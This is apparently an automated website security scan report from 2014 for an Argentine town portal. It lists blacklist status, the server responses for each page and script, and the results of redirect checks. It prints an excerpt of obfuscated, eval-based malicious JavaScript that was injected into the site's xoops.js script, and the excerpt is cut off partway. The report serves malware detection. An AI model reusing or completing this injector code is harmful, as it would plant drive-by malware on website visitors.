Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=montemaiz.com.ar
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://montemaiz.com.ar/ | HTTP/1.1 302 Found Connection: close Date: Sun, 07 Sep 2014 05:44:30 GMT Location: http://www.montemaiznet.com.ar/php/ Server: Apache Content-Length: 5901 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://www.montemaiznet.com.ar/php/ | 200 OK Content-Length: 33713 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: montemaiz.com.ar ...[78 bytes skipped]... /www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta http-equiv="content-language" content="es" /> <meta name="robots" content="index,follow" /> <meta name="keywords" content="monte maiz, montemaiznet, procoop, agrometal, ingersoll,montemaiz.com.ar,montemaiz,montemaiz.com" /> <meta name="description" content="MonteMaizNet, el sitio de Monte MaÃz en la Red" /> <meta name="rating" content="general" /> <meta name="author" content="Procoop" /> <meta name="copyright" content="Copyright © 2010" /> <meta name="generator" content="XOOPS" /> <title>MonteMaizNet - El sitio de Monte MaÃz en la Red</title> <link href="http://www.montemaiznet.com.ar/php/favi ...[3939 bytes skipped]... | ||
http://www.montemaiznet.com.ar/php/include/xoops.js | 200 OK Content-Length: 18198 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) qsvty="y";zaqse="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[zaqse].getElementById("asd"))}()}catch(tkwapv){ahio=function(xsmawi){xsmawi="fro"+xsmawi;for(rcf=0;rcf<qsvty.length;rcf++){ehed+=String[xsmawi](ggf(igt+(qsvty[rcf]))-(11));}};};ggf=(window.eval);igt="0x";dpt=0;if(!dpt){try{++ggf(zaqse)["\x62o"+"d"+qsvty]}catch(tkwapv){ldign="^";}qsvty="2b^71^80^79^6e^7f^74^7a^79^2b^71^72^71^73^83^3b^44^33^34^2b^86^18^15^2b^81^6c^7d^2b^7e^7f^6c^7f^74^6e^48^32^6c^75^6c^83 Antivirus reports:
| ||
http://www.montemaiznet.com.ar/php/class/textsanitizer/image/image.js | 200 OK Content-Length: 902 Content-Type: application/javascript | clean |
http://www.infobae.com/adjuntos/noticias/0000006.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=604800 Connection: close Date: Sun, 07 Sep 2014 05:44:35 GMT Location: http://www.infobae.com/ Server: nginx Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Content-Type: text/html; charset=iso-8859-1 Cache: MISS1 XLocation: Error2 | clean |
http://www.infobae.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 07 Sep 2014 05:44:36 GMT Location: /america Server: AkamaiGHost Content-Length: 0 | clean |
http://www.infobae.com/america | 200 OK Content-Length: 202654 Content-Type: text/html | clean |
http://b.scorecardresearch.com/c2/8030908/ct.js | 200 OK Content-Length: 1886 Content-Type: application/x-javascript | clean |
http://www.infobae.com//js/mootools-core-1.4.0.js?v-1405370019/ | 200 OK Content-Length: 154717 Content-Type: application/x-javascript | clean |
http://www.infobae.com//js/cms.tools.js?v-1405370019/ | 200 OK Content-Length: 12607 Content-Type: application/x-javascript | clean |
http://www.infobae.com//js/fbinit.js?v-1405370019/ | 200 OK Content-Length: 273 Content-Type: application/x-javascript | clean |
http://www.infobae.com//td/modulos/usuariosweb/js/fbconnect.js?v-1405370002/ | 200 OK Content-Length: 1362 Content-Type: application/x-javascript | clean |
http://www.infobae.com//td/modulos/usuariosweb/js/twconnect.js?v-1405370002/ | 200 OK Content-Length: 855 Content-Type: application/x-javascript | clean |
http://www.infobae.com//td/modulos/usuariosweb/js/gpconnect.js?v-1405370002/ | 200 OK Content-Length: 851 Content-Type: application/x-javascript | clean |
http://www.infobae.com//td/modulos/usuariosweb/js/usuariosweb.js?v-1405370002/ | 200 OK Content-Length: 14132 Content-Type: application/x-javascript | clean |
http://www.infobae.com//libs/mootools-more/Base64.js?v-1405370018/ | 200 OK Content-Length: 3433 Content-Type: application/x-javascript | clean |
http://www.infobae.com/js/infobae/usuariosweb.js?v-1405370019 | 200 OK Content-Length: 13886 Content-Type: application/x-javascript | clean |
http://www.infobae.com/js/infobae/twconnect.js?v-1405370019 | 200 OK Content-Length: 437 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: montemaiz.com.ar
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 07 Sep 2014 05:44:30 GMT
Location: http://www.montemaiznet.com.ar/php/
Server: Apache
Content-Length: 5901
Content-Type: text/html
X-Powered-By: PHP/5.3.28
...5901 bytes of data.
GET / HTTP/1.1
Host: montemaiz.com.ar
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 07 Sep 2014 05:44:30 GMT
Location: http://www.montemaiznet.com.ar/php/
Server: Apache
Content-Length: 5901
Content-Type: text/html
X-Powered-By: PHP/5.3.28
...5901 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: montemaiz.com.ar
Referer: http://www.google.com/search?q=montemaiz.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: montemaiz.com.ar
Referer: http://www.google.com/search?q=montemaiz.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.